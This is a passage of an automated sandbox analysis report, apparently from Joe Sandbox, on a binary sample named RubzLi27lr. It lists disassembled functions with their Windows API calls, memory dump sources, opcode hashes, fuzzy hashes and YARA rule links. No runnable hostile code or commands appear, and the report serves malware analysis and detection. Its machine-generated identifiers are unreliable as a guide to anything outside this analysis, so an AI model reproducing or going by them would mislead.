                                                                                                                  • String ID: %.3d$X64
                                                                                                                  • API String ID: 481472006-1077770165
                                                                                                                  • Opcode ID: 8059e6fca1acd5ad9e9195a9b1f157c1c6d71fc08c1bd5a78200385ec714066d
                                                                                                                  • Instruction ID: 437e89e43f69446bb07cc33f92375d7ff2f65736fc4c72c5a1ed1d7975f56410
                                                                                                                  • Opcode Fuzzy Hash: 8059e6fca1acd5ad9e9195a9b1f157c1c6d71fc08c1bd5a78200385ec714066d
                                                                                                                  • Instruction Fuzzy Hash: C9D01271809118EACB9097D4CC85DB9BBFCFB08301F5184E6F80A920C0DB24CA086B61
                                                                                                                  Function 00B42322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B4232C
                                                                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B4233F
                                                                                                                    • Part of subcall function 00B1E97B: Sleep.KERNEL32 ref: 00B1E9F3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                  • Opcode ID: 96c0b46e91fa74ef89a2461bec019fc2f68b69a4d95edd776d88d7f1249adddc
                                                                                                                  • Instruction ID: 4d3758b18acf9b0164e5eadba15ec0c1f08f84eafc5ddef3a132a7328f8f4302
                                                                                                                  • Opcode Fuzzy Hash: 96c0b46e91fa74ef89a2461bec019fc2f68b69a4d95edd776d88d7f1249adddc
                                                                                                                  • Instruction Fuzzy Hash: 7DD0A93A381300B6E2A8A3309C0FFCA6A64AB00B00F0089027B1AAB0E0C9B0A8008A00
                                                                                                                  Function 00B42356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B4236C
                                                                                                                  • PostMessageW.USER32(00000000), ref: 00B42373
                                                                                                                    • Part of subcall function 00B1E97B: Sleep.KERNEL32 ref: 00B1E9F3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                  • Opcode ID: 79d9a6a0da48a2ca3cdd9b57509b65de2591a71c6560b97b85491e8eee5bd1d7
                                                                                                                  • Instruction ID: e4a247f03e9b9f0aa469d40f52c27ae28f71cd9de85b3202f9bcca7fbd1a77c2
                                                                                                                  • Opcode Fuzzy Hash: 79d9a6a0da48a2ca3cdd9b57509b65de2591a71c6560b97b85491e8eee5bd1d7
                                                                                                                  • Instruction Fuzzy Hash: 13D0A9363823007AE2A8A3309C0FFCA6A64AB01B00F4089027B16AB0E0C9B0A8008A04
                                                                                                                  Function 00AEBDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00AEBE93
                                                                                                                  • GetLastError.KERNEL32 ref: 00AEBEA1
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AEBEFC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1717984340-0
                                                                                                                  • Opcode ID: 7611ce9af5ed28a9161d6df5a0114fe4e2f78de17a70f12ae8b848ff38f7f44d
                                                                                                                  • Instruction ID: b930779786668cb23396d45e2a6b9f10501384eac58f66a33d8e4ef4a758dc77
                                                                                                                  • Opcode Fuzzy Hash: 7611ce9af5ed28a9161d6df5a0114fe4e2f78de17a70f12ae8b848ff38f7f44d
                                                                                                                  • Instruction Fuzzy Hash: 2741D534611286AFCF21DFA6CD58ABB7BB5AF42710F144169F959A72A1DB30CD00DBB0